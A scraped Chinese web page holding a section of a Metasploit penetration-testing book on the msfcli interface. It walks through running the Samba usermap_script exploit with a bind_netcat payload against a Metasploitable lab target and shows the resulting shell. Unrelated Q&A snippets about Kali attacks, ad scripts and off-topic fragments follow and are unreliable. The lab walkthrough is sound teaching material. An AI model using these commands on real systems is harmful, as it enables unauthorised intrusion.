1.6.3　msfcli命令行程序
本文所属图书&>&
全书共10章。第1章对渗透测试和Metasploit进行了系统介绍，首先介绍了渗透测试的分类、方法、流程、过程环节等，然后介绍了Metasploit的功能、结构和基本的使用方法。第2章详细演示了渗透测试实验环境的搭建。第&&
&最后让我们尝试msfcli命令行程序的使用接口，这个接口让我们能够在Shell命令行里完成一次完整的渗透攻击过程&，技术总监继续熟练地演示着Metasploit的使用方法。
msfcli命令行程序是Metasploit框架为脚本自动化处理及与其他命令行工具互操作而设计的一种用户接口，它可以直接从命令行Shell执行，并允许你通过Linux的管道机制将结果输出重定向给其他程序进行处理。当你需要针对一个网络中的大量系统进行同一安全的渗透测试与检查，msfcli将是特别适用的Metasploit框架调用接口，你可以针对一个系统配置好msfcli的命令行参数，然后写一段简单的Shell脚本来对一组IP地址进行依次测试，并将结果输出到日志文件中以供查询和进一步分析。
msfcli命令行程序的使用方法使用-h选项进行显示，如下：
root@bt:~# msfcli -h
Usage: /opt/framework3/msf3/msfcli &exploit_name& &option=value& [mode]
====================================================================
&&& Mode&&&&&&&&& Description
&&& (H)elp&&&&& You're looking at it baby!&&&&&&&&&&&& #帮助信息，你现在看的就是啊
&&& (S)ummary&& Show information about this module&&&&&&& #显示关于该模块详细信息
&&& (O)ptions&& Show available options for this module&&&&&&&& #显示所有配置选项
&&& (A)dvanced& Show available advanced options for this module
#显示该模块的所有高级配置选项
&&& (I)DS Evasion& Show available ids evasion options for this module
#显示该模块的可用IDS逃逸选项
&&& (P)ayloads&&&& Show available payloads for this module
#显示该模块适用的攻击载荷
&&& (T)argets&&&&& Show available targets for this exploit module
#显示渗透攻击模块的所有攻击目标类型
&&& (AC)tions&&&&& Show available actions for this auxiliary module
#显示辅助模块的所有可用动作
&&& (C)heck&&&&&&& Run the check routine of the selected module
#运行选定模块的检查例程
&&& (E)xecute&&&&& Execute the selected module& 　　　　　　　　　　#运行选定的模块
而使用msfcli命令行实施一次渗透攻击的过程通常会采用如下流程（我们还是以Metasploitable中Samba服务的usermap_script攻击为例）：
msfcli multi/samba/usermap_script S：对选定的渗透攻击模块显示详细信息。
msfcli multi/samba/usermap_script P：查看可用的攻击载荷。
msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat O：选择一个攻击载荷，并查看需要设置的配置参数。
msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat T：查看渗透攻击模块的目标类型列表。
以option=value方式设置所需要设置的配置参数，并以E模式来执行这次渗透攻击。
下面我们在msfcli命令行中，重复一次对Metasploitable靶机的渗透攻击，命令如下：
root@bt:~# msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/
bind_netcat RHOST=10.10.10.254 E
[*] Please wait while we load the module tree&
PAYLOAD =& cmd/unix/bind_netcat
RHOST =& 10.10.10.254
[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:56139 -& 10.10.10.254:4444) at
11:18:18 -0400
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC
相比较于MSF终端，msfcli命令行程序的弱点在于所支持的功能特性较少，如尚不支持将结果输入到后台中，同时只能处理一个Shell从而使得对客户端攻击不太实用，以及不支持MSF终端中的高级自动化渗透特性（如db_autopwn等）。
您对本文章有什么意见或着疑问吗？请到您的关注和建议是我们前行的参考和动力&&
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
您的浏览器不支持嵌入式框架，或者当前配置为不显示嵌入式框架。
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'Kali工具中的 msf 为什么不能自动化攻击_百度知道
Kali工具中的 msf 为什么不能自动化攻击
下载一个db_autopwn。然后加就行了，
可以自动。
来自团队：
其他类似问题
为您推荐：
msf的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁MSF中自动化浏览器攻击_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
MSF中自动化浏览器攻击
上传于||暂无简介
阅读已结束，如果下载本文需要使用0下载券
想免费下载更多文档？
定制HR最喜欢的简历
你可能喜欢kali 攻击-中国学网
状态:1个回答日期：回答人:疯狂的兔子2519答：wifi破解，局域网内部arp投毒实现中间人攻击等，metasploit渗透，sqlmap,w3af等web安全神器，用数不尽好玩的东西。具体的可以去BT中文网看看。状态:2个回答日期：回答人:中国学网网友答：不用的,它自带Apache. Kali Linux 前身是 BackTrack（基于ubuntu），是一个基于 Debian 的 Linux 发行版，包含很多安全和取证方面的相关工具。支持 ARM架构。 Kali Linux是基于Debian的Linux发行版， 设计用于数字取证和渗透测试 和 黑客攻防。...状态:1个回答日期：回答人:百度知道客户端答：可能不是专业版的状态:1个回答日期：回答人:snowxn答：版本问题，msf专业版可以的状态:1个回答日期：回答人:snowxn问：怎么在metasploit加入自己写的攻击模块？ 我按照魔鬼训练营讲的做了，提...答：只要你掌握Msf的命令模式就行了，不管在什么系统下，这个软件都是差不多的！Failed to load module没有找到这个模块，你肯定哪个地方出错了！ 有些地方最好做个笔记，这样记得快点！ 还有，你说的那本书的模块攻击，在那一页上？状态:1个回答日期：回答人:问：kali linux 的java applet攻击。误将监听终端关闭了。那么还会监听吗？...答：不会的，监听是由程序来做的 netstat Capn查看端口使用情况状态:5个回答日期：回答人:BAKASSS答：这是被动 所不需要按 右击目标 然后右击地板就可以跳跃了 新游戏模式 设计师L4T3NCY谈及新游戏模式“报复大对决”： “大家好！今年首个特色模式‘报复大对决’将更新至PBE了。而这一次，你可以为敌方选择英雄，他们将使用你所选择的英雄在召唤师峡谷...状态:2个回答日期：回答人:我心只向禅问：只能在文件夹中找到/usr/share/fern-wifi-cracker execute.py。找不到py...答：这个工具在kali下直接可以运行啊，在应用程序――kali linux――无线攻击――其他工具集下可以找到的，至于怎么安装，建议你先把怎么安装linux系统学会，这个很好装的，你到linux贴吧里 ，有很多贴子教你安装！状态:3个回答日期：回答人:丶丿一笑奈何答：用A攻击，鼠标直接放到你想移动方位的方向比较好。容易控制。状态:1个回答日期：Wp2无法破解 wpa几乎渺茫 路由器有防火墙加防攻击加八项防御系统状态:1个回答日期：速度W 等Q的冷却 冷却好后再次Q平A然后 RR点火 如果对面在你第一次R过去后逃跑 追上去 别打 等Q冷却了 后再QRER 点火 对面就跪了 总之要记住阿卡利的攻击不是爆发型...状态:1个回答日期：一般app在局域网经常被攻击,你是说路由器被攻击还是别的,重启计算机,在ms-dos窗口下运行命令arp-d,可恢复上网,在360安全卫士的app防火墙开启,挺管用的,还不行就用kali的...状态:1个回答日期：&中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。ARP攻击...状态:1个回答日期：所以还是用一个长度在60CM长度的棍子比较好,因为在那个时候,距离就是安全。棍子可以选用甩棍或者是菲律宾魔杖(kali)状态:1个回答日期：现在针对大流量洪水的攻击,往往是最令站长们烦恼的了,因为这些攻击通常是模拟正常用户向网站或者服务器发包,建议网站使用神盾安防中心的立体式防御系统,可以隐藏Ip,多...状态:1个回答日期： 国际十大搏击术: 10、巴西柔术 Brazilian Jiu-Jitsu 是日本的关节技和杠杆原理发展而来的,与柔道不同的是,巴西柔术的优势是倒在地上进行搏击。 9、卡里棍术 Ka-Li 由...状态:1个回答日期：的漏洞进行攻击状态:1个回答日期：Shekina的名字来源于Kali Ma的Tantrism派冠名Shakti Kali,因此六角星被犹太人理解为... 。当然目前鼬还没有用它攻击人.总之天照应该是攻击型忍术中最强的了.但是天照太消...状态:1个回答日期：元素阴阳性 元素阳性与阴性火、风阳性、水阴性阳性攻击元素阴性保护元素传说咒语若阴性字母较赐福阳性字母较则降祸;阳性元素战阴性平塔罗牌符号由卡利神(Kali)四手持神...
与【kali 攻击】相关信息:&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
用户还关注
12345678910
大类导航： |推荐这篇日记的豆列
······